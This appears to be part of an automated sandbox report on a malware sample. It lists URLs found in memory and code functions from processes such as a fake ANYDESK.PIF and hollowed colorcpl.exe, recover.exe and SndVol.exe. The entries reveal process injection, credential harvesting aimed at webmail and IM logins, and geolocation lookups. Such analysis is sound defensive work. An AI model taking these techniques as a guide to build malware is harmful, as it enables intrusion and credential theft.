Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0= |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0? |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0= |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0 |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR |
Source: colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe | String found in binary or memory: http://geoplugin.net/json.gp |
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2084642052.00000000031AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp) |
Source: SndVol.exe, 0000003E.00000002.2145980363.0000000006831000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 0000003E.00000002.2141597458.0000000000400000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C |
Source: colorcpl.exe, 00000023.00000003.2078794382.00000000031A9000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2136599199.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000002.2295912725.00000000031AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpP |
Source: colorcpl.exe, 00000023.00000002.2293950327.0000000003187000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000023.00000003.2138790179.000000000317C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/son.gp |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.digicert.com0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.digicert.com0: |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.digicert.com0H |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.digicert.com0I |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.digicert.com0Q |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.msocsp.com0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://ocsp.msocsp.com0S |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://www.digicert.com/CPS0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: http://www.digicert.com/CPS0~ |
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com |
Source: recover.exe, recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com |
Source: recover.exe, 00000035.00000003.2097195467.000000000316D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000035.00000003.2097309040.000000000316D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.coma |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr |
Source: recover.exe, 0000002F.00000002.2133255398.00000000005F4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net |
Source: recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/ |
Source: ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E863000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1881559620.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000002.1859269663.00000000208AA000.00000004.00001000.00020000.00000000.sdmp, ANYDESK.PIF, 0000001A.00000003.1821868863.000000007E8DE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr | String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?6cc2fc022d35de4436d46235 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://0bf8c87e7673b17d24aaf92c4c29ca42.azr.footprintdns.com/apc/trans.gif?97ae33b93885af7139d3f9b0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?6aff50c04f9af0461603c0c1 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://6a1824ae7f5b378648db1f87c4a047c1.azr.footprintdns.com/apc/trans.gif?e4d500512ddeced1b68e7640 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?67e56b9b06a4d427a359554f |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://9cf1d93416b343cbb0aa1deae6dc7661.azr.footprintdns.com/apc/trans.gif?b4ef4344b8bbbc91cc6b3006 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFp |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?2b5ac21b953982869b52cfd6 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ebd871449a8dbfc3efbaabaef620b095.clo.footprintdns.com/apc/trans.gif?b53a91fd779d41798d7818ff |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAXr4b&Fr |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?2b2f77512f7c65b2f52ee30ffe87d61a |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?355cac43462bdbbb118c6145bdcc88c0 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?42704eed386765f870e05e14b5b322b7 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-afd.azurefd.net/apc/trans.gif?b21ec88677686eb844798ccd641c5fe5 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?086008d5de6d8b19567a45da7804f652 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?79007fa287900ed2975a809f346f1f62 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com: |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live |
Source: ghf.pif, 00000014.00000000.1782654127.00007FF789D1E000.00000002.00000001.01000000.00000009.sdmp, ghf.pif.18.dr | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah |
Source: recover.exe | String found in binary or memory: https://login.yahoo.com/config/login |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://maps.windows.com/windows-app-web-link |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-06-09-30-15/PreSignInSettingsConfig.json?One |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=b12f1ec5da72bf506d52 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=e0a3ca |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2bedfa25f63b1e1b9bd24eb0a5625631 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?f60497627d681e8f4d8561fad4b92959 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2 |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://www.digicert.com/CPS0 |
Source: recover.exe, recover.exe, 00000035.00000002.2097993419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com |
Source: recover.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin |
Source: bhv3B03.tmp.47.dr | String found in binary or memory: https://www.office.com/ |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B13380 NtWriteVirtualMemory, | 26_2_02B13380 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B13034 NtAllocateVirtualMemory, | 26_2_02B13034 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B19654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 26_2_02B19654 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B19738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, | 26_2_02B19738 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B195CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 26_2_02B195CC |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B16AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, | 26_2_02B16AE0 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B1421A GetThreadContext,SetThreadContext,NtResumeThread, | 26_2_02B1421A |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B1421C GetThreadContext,SetThreadContext,NtResumeThread, | 26_2_02B1421C |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B13032 NtAllocateVirtualMemory, | 26_2_02B13032 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B19578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 26_2_02B19578 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B1399C NtProtectVirtualMemory, | 26_2_02B1399C |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, | 47_2_0040BAE3 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004016FD NtdllDefWindowProc_A, | 49_2_004016FD |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004017B7 NtdllDefWindowProc_A, | 49_2_004017B7 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00402CAC NtdllDefWindowProc_A, | 53_2_00402CAC |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 53_2_00402D66 NtdllDefWindowProc_A, | 53_2_00402D66 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A36AE0 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx, | 60_2_02A36AE0 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A33380 NtWriteVirtualMemory, | 60_2_02A33380 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A33034 NtAllocateVirtualMemory, | 60_2_02A33034 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A39738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, | 60_2_02A39738 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A33A34 NtProtectVirtualMemory, | 60_2_02A33A34 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A3421A Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, | 60_2_02A3421A |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A3421C Toolhelp32ReadProcessMemory,Thread32Next,GetThreadContext,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Heap32Next,Toolhelp32ReadProcessMemory,Heap32ListFirst,SetThreadContext,NtResumeThread,Thread32Next, | 60_2_02A3421C |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A33032 NtAllocateVirtualMemory, | 60_2_02A33032 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A39809 NtQueryInformationFile,NtReadFile,NtClose, | 60_2_02A39809 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A3399C NtProtectVirtualMemory, | 60_2_02A3399C |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A39654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose, | 60_2_02A39654 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A3341B NtWriteVirtualMemory, | 60_2_02A3341B |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A395CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 60_2_02A395CC |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 60_2_02A39578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, | 60_2_02A39578 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle, | 62_2_0041C077 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle, | 62_2_0041C0A3 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0684CF05 OpenProcess,NtSuspendProcess,CloseHandle, | 62_2_0684CF05 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0684CF31 OpenProcess,NtResumeProcess,CloseHandle, | 62_2_0684CF31 |
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 62_2_0684EB56 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA, | 62_2_0684EB56 |
Source: C:\Users\Public\ANYDESK.PIF | Code function: 26_2_02B020B4 | 26_2_02B020B4 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 35_2_05377194 | 35_2_05377194 |
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 35_2_0536B5C1 | 35_2_0536B5C1 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044A030 | 47_2_0044A030 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0040612B | 47_2_0040612B |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0043E13D | 47_2_0043E13D |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044B188 | 47_2_0044B188 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00442273 | 47_2_00442273 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044D380 | 47_2_0044D380 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044A5F0 | 47_2_0044A5F0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_004125F6 | 47_2_004125F6 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_004065BF | 47_2_004065BF |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_004086CB | 47_2_004086CB |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_004066BC | 47_2_004066BC |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044D760 | 47_2_0044D760 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00405A40 | 47_2_00405A40 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00449A40 | 47_2_00449A40 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00405AB1 | 47_2_00405AB1 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00405B22 | 47_2_00405B22 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044ABC0 | 47_2_0044ABC0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00405BB3 | 47_2_00405BB3 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00417C60 | 47_2_00417C60 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044CC70 | 47_2_0044CC70 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00418CC9 | 47_2_00418CC9 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044CDFB | 47_2_0044CDFB |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044CDA0 | 47_2_0044CDA0 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_0044AE20 | 47_2_0044AE20 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00415E3E | 47_2_00415E3E |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 47_2_00437F3B | 47_2_00437F3B |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00405038 | 49_2_00405038 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0041208C | 49_2_0041208C |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004050A9 | 49_2_004050A9 |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0040511A | 49_2_0040511A |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_0043C13A | 49_2_0043C13A |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_004051AB | 49_2_004051AB |
Source: C:\Windows\SysWOW64\recover.exe | Code function: 49_2_00449300 | 49_2_00449300 |
